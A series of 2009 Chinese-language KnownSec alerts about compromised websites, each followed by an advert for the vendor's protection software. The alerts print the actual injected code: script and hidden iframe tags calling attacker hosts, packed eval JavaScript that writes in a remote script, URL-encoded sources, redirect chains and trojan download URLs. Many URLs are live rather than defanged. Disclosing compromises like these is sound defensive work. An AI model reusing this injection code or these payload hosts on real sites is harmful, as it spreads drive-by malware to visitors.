知道创宇

发布时间：Tue Mar 31 2009 18:00:17 UTC+0800
最后更新时间：Tue Mar 31 2009 18:00:17 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 《机电工程技术》杂志社（http://www.china-meet.cn/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.china-meet.cn/

网页被嵌入恶意链接代码：

<script language=”javascript” src=”http://css3.viens.la/css.js?tid=gb&pid=80″></script>

挂马分析：
[wide]http://www.china-meet.cn/
 [script]http://css3.viens.la/css.js?tid=gb&pid=80
  [frame]http://ainirr.cn/35/35.htm
   [frame]http://ainirr.cn/35/yt14.htm
    [script]http://ainirr.cn/35/14.js
    [script]http://ainirr.cn/35/15.js
   [frame]http://ainirr.cn/35/ytfl.htm
    [frame]http://ainirr.cn/35/yt11.htm
    [frame]http://ainirr.cn/35/yt22.htm
    [frame]http://ainirr.cn/35/yt11.htm
   [frame]http://ainirr.cn/35/ytxxz.htm
   [frame]http://ainirr.cn/35/ytgg.htm
   [frame]http://ainirr.cn/35/ytff.htm
    [script]http://ainirr.cn/35/ff.js
   [frame]http://ainirr.cn/35/ytbf.htm
    [script]http://ainirr.cn/35/one.js
   [frame]http://ainirr.cn/35/real.htm
   [frame]http://ainirr.cn/35/yt122121.htm
    [script]http://ainirr.cn/35/turl.js
    [script]http://ainirr.cn/35/real.js
    [script]http://ainirr.cn/35/real1.js
   [script]http://js.tongji.cn.yahoo.com/963243/ystat.js
   [script]http://js.tongji.cn.yahoo.com/902019/ystat.js
  [frame]http://ainirr.cn/35/35.htm
  [frame]http://count25.51yes.com/sa.aspx?id=259340713&amp;refe=

最终下载病毒文件：
http://yasws-05.cn/35/35.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 9% [?]

发布时间：Tue Mar 31 2009 18:00:17 UTC+0800
最后更新时间：Tue Mar 31 2009 18:00:17 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 天空游戏网（http://www.tkgame.com/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://download.tkgame.com/img/nav_over.js

网页被嵌入恶意链接代码：

document.write (”<iframe src=http://www.tuuuu.com.cn/11/zz.htm width=50 height=0></iframe>”);

挂马分析：
[wide]http://download.tkgame.com/down/pcgame/spg/2006-12-26/6815.html
 [script]http://download.tkgame.com/img/nav_over.js
  [frame]http://www.tuuuu.com.cn/11/zz.htm
   [frame]http://www.tuuuu.com.cn/11/index.htm
    [frame]http://www.tuuuu.com.cn/11/14.htm
     [script]http://www.tuuuu.com.cn/11/ms06014.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/flash.htm
    [frame]http://www.tuuuu.com.cn/11/902.htm
     [script]http://www.tuuuu.com.cn/11/09002.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/lz.htm
     [script]http://www.tuuuu.com.cn/11/lz.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/office.htm
     [script]http://www.tuuuu.com.cn/11/office.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/qv.htm
     [script]http://www.tuuuu.com.cn/11/qvod.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/real.htm
     [script]http://www.tuuuu.com.cn/11/real.js
      [exe]http://ubbbb.com.cn/qq.css
    [frame]http://www.tuuuu.com.cn/11/real.html
     [script]http://www.tuuuu.com.cn/11/re11.js
      [exe]http://ubbbb.com.cn/qq.css
   [script]http://s89.cnzz.com/stat.php?id=1322948&web_id=1322948
 [script]http://www3.tkgame.com/js/download_01_680×60.js
 [script]http://download.tkgame.com/e/public/viewclick?classid=109&id=6815
 [script]http://www3.tkgame.com/js/download_04_230×210.js
 [script]http://download.tkgame.com/e/public/onclick?enews=donews&classid=109&id=6815
 [script]http://tkbd1.tkgame.com/count/mystat.asp?siteid=6

最终下载病毒文件：
http://ubbbb.com.cn/qq.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 8% [?]

发布时间：Tue Mar 31 2009 18:00:17 UTC+0800
最后更新时间：Tue Mar 31 2009 18:00:17 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 NBA现场直播网（http://www.nbaxianchang.cn/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.nbaxianchang.cn/include/dedeajax2.js

网页被嵌入恶意链接代码：

function goad(){var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ } else { document.cookie = “Cookie1=Filter;expires=”+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’4.9(”<7 8=6:\/\/a.%2%0.3\/%1.5><\/7>”)’,62,11,’2D520|6A|6Ci|cn|document|gif|http|script|src|writeln|www’.split(’|'),0,{}));window.status=”完毕”;}}goad();

解密后链接为：http://www.li-520.cn/j.gif

挂马分析：
[wide]http://www.nbaxianchang.cn/
 [script]http://www.nbaxianchang.cn/include/dedeajax2.js
  [script]http://www.li-520.cn/j.gif
   [frame]http://sjfhsk.cn:6135/b148610/b14.htm
    [frame]http://sjfhsk.cn:6135/b148610/new.html
     [frame]http://sjfhsk.cn:6135/b148610/fx.htm
     [frame]http://sjfhsk.cn:6135/b148610/../14.htm
      [script]http://sjfhsk.cn:6135/b148610/../14.js
       [exe]http://c-bp.cn:6135/qwer/ms.css
     [frame]http://sjfhsk.cn:6135/b148610/../as.htm
      [exe]http://c-bp.cn:6135/qwer/as.css
     [frame]http://sjfhsk.cn:6135/b148610/../bfyy.htm
      [script]http://sjfhsk.cn:6135/b148610/../bf.js
       [exe]http://c-bp.cn:6135/qwer/bf.css
     [frame]http://sjfhsk.cn:6135/b148610/../lzz.htm
      [script]http://sjfhsk.cn:6135/b148610/../lzz.js
       [exe]http://c-bp.cn:6135/qwer/lzz.css
     [frame]http://sjfhsk.cn:6135/b148610/../real10.htm
      [script]http://sjfhsk.cn:6135/b148610/../real.js
       [exe]http://c-bp.cn:6135/qwer/re.css
     [frame]http://sjfhsk.cn:6135/b148610/../real11.htm
      [script]http://sjfhsk.cn:6135/b148610/../realplay.js
       [exe]http://c-bp.cn:6135/qwer/real11.css
     [frame]http://sjfhsk.cn:6135/b148610/../cx.htm
      [script]http://sjfhsk.cn:6135/b148610/../xmybrx.js
       [exe]http://c-bp.cn:6135/qwer/adr.css
     [script]http://sjfhsk.cn:6135/b148610/../wewew.js
      [cab]http://c-bp.cn:6135/baidu.cab
    [script]http://count1.51much.com/cnt.php?uid=ua-1-12775&style=icon
    [script]http://s131.cnzz.com/stat.php?id=1138910&web_id=1138910

最终下载病毒文件：
http://c-bp.cn:6135/qwer/ms.css
http://c-bp.cn:6135/qwer/as.css
http://c-bp.cn:6135/qwer/bf.css
http://c-bp.cn:6135/qwer/lzz.css
http://c-bp.cn:6135/qwer/re.css
http://c-bp.cn:6135/qwer/real11.css
http://c-bp.cn:6135/qwer/adr.css
http://c-bp.cn:6135/baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 9% [?]

发布时间：Mon Mar 30 2009 19:25:08 UTC+0800
最后更新时间：Mon Mar 30 2009 19:25:08 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 辽宁互联星空（http://ln.vnet.cn/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://ln.vnet.cn/top.htm

网页被嵌入恶意链接代码：

<iframe src=http://se3.abisp.cn/02/02.htm width=100 height=0></iframe>

挂马分析：
[wide]http://ln.vnet.cn/
 [frame]http://ln.vnet.cn/top.htm
  [frame]http://se3.abisp.cn/02/02.htm
   [frame]http://se3.abisp.cn/02/14.htm
   [frame]http://se3.abisp.cn/02/flash.htm
   [frame]http://se3.abisp.cn/02/002.htm
   [frame]http://se3.abisp.cn/02/office.htm
   [frame]http://se3.abisp.cn/02/lz.htm
   [frame]http://se3.abisp.cn/02/bf.htm
   [frame]http://se3.abisp.cn/02/real.htm
   [frame]http://se3.abisp.cn/02/real.html

最终下载病毒文件：
http://cao.meijiatd.cn/00.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 10% [?]

发布时间：Mon Mar 30 2009 19:25:08 UTC+0800
最后更新时间：Mon Mar 30 2009 19:25:08 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：2008北京体育网、中铁第四勘察设计院集团有限公司、南宁五菱桂花车辆有限公司、九江市第五人民医院、
 

2008北京体育网（hxxp://www.2008beijing.net/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://www.00-852.com/exec1/newsscript/news14.js”></script>
通过漏洞攻击，最终下载病毒：
hxxp://9ke8.com/xia/f1.css
 

中铁第四勘察设计院集团有限公司（hxxp://www.crfsdi.com/）多处被植入恶意代码：
<script src=hxxp://%71%77%72%37%2E%63%6E></script>
通过漏洞攻击，最终下载病毒：
hxxp://d3.741239.com/03/g.exe
hxxp://d3.741239.com/03/Baidu.cab
 

南宁五菱桂花车辆有限公司（hxxp://www.china-guihua.com/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://faq.ht.cx/office.js?google_ad_format=728×90_as&google_ad_type=text_image”></script>
通过漏洞攻击，最终下载病毒：
hxxp://d3.741239.com/03/g.exe
hxxp://d3.741239.com/03/Baidu.cab
 

九江市第五人民医院（hxxp://www.jjwyy.com/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://css.sarl.tk/css.js?width=700&height=600&keyword=uf556″></script>
通过漏洞攻击，最终下载病毒：
hxxp://d3.741239.com/03/g.exe
hxxp://d3.741239.com/03/Baidu.cab
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 10% [?]

发布时间：Sun Mar 29 2009 21:27:26 UTC+0800
最后更新时间：Sun Mar 29 2009 21:27:26 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获北京市西城区体育局网站被植入恶意代码：
 

北京市西城区体育局（www.yuetansports.com）多处被植入恶意代码：
[wide]hxxp://www.yuetansports.com/index.jsp
    [script]hxxp://3b3.org/c.js
        [frame]hxxp://qjwm88.cn/02/02.htm
            [frame]hxxp://qjwm88.cn/02/yt14.htm
                [script]hxxp://qjwm88.cn/02/14.js
                [script]hxxp://qjwm88.cn/02/15.js
            [frame]hxxp://qjwm88.cn/02/ytfl.htm
            [frame]hxxp://qjwm88.cn/02/ytxxz.htm
            [frame]hxxp://qjwm88.cn/02/ytgg.htm
            [frame]hxxp://qjwm88.cn/02/ytff.htm
            [frame]hxxp://qjwm88.cn/02/ytbf.htm
            [frame]hxxp://qjwm88.cn/02/real.htm
            [frame]hxxp://qjwm88.cn/02/yt122121.htm
            [script]hxxp://js.tongji.cn.yahoo.com/963243/ystat.js
            [script]hxxp://js.tongji.cn.yahoo.com/902019/ystat.js
        [frame]hxxp://qjwm88.cn/02/02.htm
        [script]hxxp://js.tongji.cn.yahoo.com/908507/ystat.js
    [script]hxxp://3b3.org/c.js
    [script]hxxp://3b3.org/c.js
    [script]hxxp://3b3.org/c.js
    [script]hxxp://3b3.org/c.js
    [script]hxxp://3b3.org/c.js
    [script]hxxp://3b3.org/c.js

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 10% [?]

发布时间：Sun Mar 29 2009 18:46:33 UTC+0800
最后更新时间：Sun Mar 29 2009 18:46:33 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 中天在线论坛（http://ww.366tian.net/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.366tian.net/include/dedeajax2.js

网页被嵌入恶意链接代码：

function goad(){var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ } else { document.cookie = “Cookie1=Filter;expires=”+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’2.a(\’<6 7=3://9.0.1/5/8.4></6>\’)',62,11,’chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln’.split(’|'),0,{}));window.status=”final”;}}goad();

解密后链接为：http://ufy9g1.chinaw3.com/s/ss.js

挂马分析：
[wide]http://www.366tian.net/include/dedeajax2.js
 [script]http://ufy9g1.chinaw3.com/s/ss.js
  [frame]http://fjdksjkq.cn:6135/b174152/b17.htm
   [frame]http://fjdksjkq.cn:6135/b174152/new.html
    [frame]http://fjdksjkq.cn:6135/b174152/fx.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../14.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../as.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../bfyy.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../lzz.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../real10.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../real11.htm
    [frame]http://fjdksjkq.cn:6135/b174152/../cx.htm
    [script]http://fjdksjkq.cn:6135/b174152/../wewew.js
    [script]http://fjdksjkq.cn:6135/b174152/../wewew.js
   [script]http://count1.51much.com/cnt.php?uid=ua-1-12775&style=icon
   [script]http://s131.cnzz.com/stat.php?id=1138914&web_id=1138914
  [script]http://js.tongji.cn.yahoo.com/866793/ystat.js
最终下载病毒文件：
http://c-bp.cn:6135/qwer/ms.css
http://c-bp.cn:6135/qwer/as.css
http://c-bp.cn:6135/qwer/bf.css
http://c-bp.cn:6135/qwer/lzz.css
http://c-bp.cn:6135/qwer/re.css
http://c-bp.cn:6135/qwer/real11.css
http://c-bp.cn:6135/qwer/adr.css
http://c-bp.cn:6135/baidu.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 8% [?]

发布时间：Sat Mar 28 2009 21:24:54 UTC+0800
最后更新时间：Sat Mar 28 2009 21:24:54 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：中国历史文化遗产保护网、上海乐群广告有限公司、中国海外上市网、
 

中国历史文化遗产保护网（hxxp://www.wenbao.net/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://ddv.sarl.tk/asd.js?s=201&col=ffdd00″></script>
通过漏洞攻击，最终下载病毒：
hxxp://www.ghfdgdf.cn/1.exe
 

上海乐群广告有限公司（hxxp://www.shlqad.com/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://css.sarl.tk/css.js?width=700&height=600&keyword=ua556″></script>
通过漏洞攻击，最终下载病毒：
hxxp://www.ghfdgdf.cn/1.exe
 

中国海外上市网（hxxp://www.globalipo.cn/）多处被植入恶意代码：
<script language=”javascript” type=”text/javascript” src=”hxxp://%77%33%6F%67%2E%63%6E/ts%2E%6A%73″></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.mxxio.com:88/new/a1.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 8% [?]

发布时间：Fri Mar 27 2009 19:28:51 UTC+0800
最后更新时间：Fri Mar 27 2009 19:28:51 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：慈善援助快车、中国化学课程网、鑫华龙临朐鑫华龙不锈钢制品厂、海南房地产、
 

慈善援助快车（hxxp://www.e12345.com.cn/）被植入恶意代码：
<script src=hxxp://3b3.org/c.js></script>
<script src=hxxp://3bo%6Db.com/c.js></script>
<script src=hxxp://cn.daxia123.cn/cn.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.mxxio.com:88/new/a1.css
 

中国化学课程网（hxxp://chem.cersp.com/js/bottom.js）被植入恶意代码：
document.writeln(”<script language=javascript type=text/javascript src=hxxp://www.shijiajinyu.cn/yad.js></script>”);
通过漏洞攻击，最终下载病毒：
hxxp://d.mxxio.com:88/new/a1.css
 

鑫华龙临朐鑫华龙不锈钢制品厂（hxxp://www.sdxinhualong.com/）被植入恶意代码：
<script language=”javascript” src=”hxxp://faq.ht.cx/office.js?google_ad_format=728×90_as&google_ad_type=text_image”></script>
<script language=javascript src=hxxp://%70%2e%39%34%73%61%6f%6d%6d%2d%63%6f%6d/js.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://www.fghrdfa.cn/1.exe
 

海南房地产（hxxp://www.hainan-home.com/online.htm）被植入恶意代码：
document.writeln(”<iframe src=\”http:\/\/bxmbaqqd9.cn\/new\/4\/new.htm?a3-\” width=100 height=0><\/iframe>”);

通过漏洞攻击，最终下载病毒：
hxxp://14ssaacaa.cn/4.exe
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 8% [?]

发布时间：Thu Mar 26 2009 21:47:18 UTC+0800
最后更新时间：Thu Mar 26 2009 21:47:18 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：黄岩人才网、沈阳环保产业网、安徽花卉网、
 

黄岩人才网（hxxp://www.hyrc.gov.cn/2008/syzcj.htm）被植入恶意代码：
<script a src=hxxp://%61%64%73%2E%32%30%2D%31%32%2E%63%6E/ad/ad.js?id=j></script>
恶意链接地址解密后为：
hxxp://ads.20-12.cn/ad/ad.js?id=j
通过漏洞攻击，最终下载病毒：
hxxp://9ke8.com/xia/f1.css
 

沈阳环保产业网（hxxp://www.syepi.com.cn/js.asp）被植入恶意代码：
<script src=hxxp://3b3.org/c.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.mxxio.com:88/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

安徽花卉网（hxxp://ahhhw.com/）被植入恶意代码：
<script src=hxxp://%63%63%6A%33%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%71%77%72%31%2E%63%6E></script><script src=hxxp://%71%77%72%32%2E%63%6E></script><script src=hxxp://%71%77%72%37%2E%63%6E></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.mxxio.com:88/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 9% [?]